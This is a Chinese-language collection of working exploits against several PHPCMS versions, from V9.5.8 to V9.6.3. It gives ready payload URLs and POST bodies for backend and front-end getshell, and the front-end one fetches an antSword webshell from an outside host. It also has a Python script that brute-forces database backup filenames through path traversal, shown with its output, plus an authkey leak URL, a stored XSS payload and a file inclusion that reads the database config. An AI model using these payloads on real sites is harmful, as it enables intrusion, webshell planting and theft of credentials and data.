phpcmsV9.5.8后台getshell:
payload:http://127.0.0.1/index.php?m=content&c=content&a=public_categorys&menuid=${@phpinfo()}
分析文章:https://www.mrwu.red/web/2723.html
phpcms v9.6.0 任意用户密码重置:
分析文章:https://www.cnblogs.com/yangxiaodi/p/6890298.html
phpcmsV9.6.0前台getshell:
访问URL:
http://127.0.0.1.com/index.php?m=member&c=index&a=register&siteid=1]www.xxx.com/index.php?m=member&c=index&a=register&siteid=
POST数据:
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=
webshell地址:页面会出现的~
分析文章:https://xz.aliyun.com/t/5730
phpcmsV9.6.0数据库备份爆破:
利用代码如下:
#!/usr/bin/env python
# coding=utf-8
'''/*
* author = Mochazz
* team = 红日安全团队
* env = pyton3
*
*/
'''
import requests
import itertools
characters = "abcdefghjklmnopqrstuvwxyz0123456789_!#"
backup_sql = ""
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
url = "http://127.0.0.1"
flag = 0
for num in range(1, 7):
if flag:
break
for pre in itertools.permutations(characters, num):
pre = ''.join(list(pre))
payload = payload.format(location=pre)
r = requests.get(url+payload)
if r.status_code == 200 and "PNG" in r.text:
flag = 1
backup_sql = pre
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
break
else:
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
print("[+] 前缀为:", backup_sql)
flag = 0
for i in range(30):
if flag:
break
for ch in characters:
if ch == characters[-1]:
flag = 1
break
payload = payload.format(location=backup_sql+ch)
r = requests.get(url + payload)
if r.status_code == 200 and "PNG" in r.text:
backup_sql += ch
print("[+] ", backup_sql)
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
break
else:
payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<"
print("备份sql文件地址为:", backup_sql+".sql")
结果为
C:\Users\dell\Desktop>python Zxc.py
[+] 前缀为: 1
[+] 12
[+] 123
[+] 1231
[+] 12312
[+] 123123
[+] 1231231
[+] 12312312
[+] 123123123
备份sql文件地址为: 123123123.sql
分析文章:
phpcmsV9.6.0 authkey泄露导致注入:
http://127.0.0.1/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
phpcmsV9.6.1 任意文件读取:
分析文章:https://xz.aliyun.com/t/5731
phpcmsV9.6.2 前台SQL注入:
分析文章:https://xz.aliyun.com/t/5731
phpcmsV9.6.3 存储型XSS:
利用方法,先注册一个帐号,然后登录,然后访问:
http://127.0.0.1/index.php?m=member&c=index&a=change_credit&
post:
dosubmit=1&fromvalue=0.6&from=1id=1`setset'&to=}" onmousemove=alert(1)>//
分析文章:https://xz.aliyun.com/t/1860
phpcmsV9.6.3文件包含:
http://127.0.0.1.com/m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php
如果存在漏洞即可成功读取到phpcms的数据库配置文件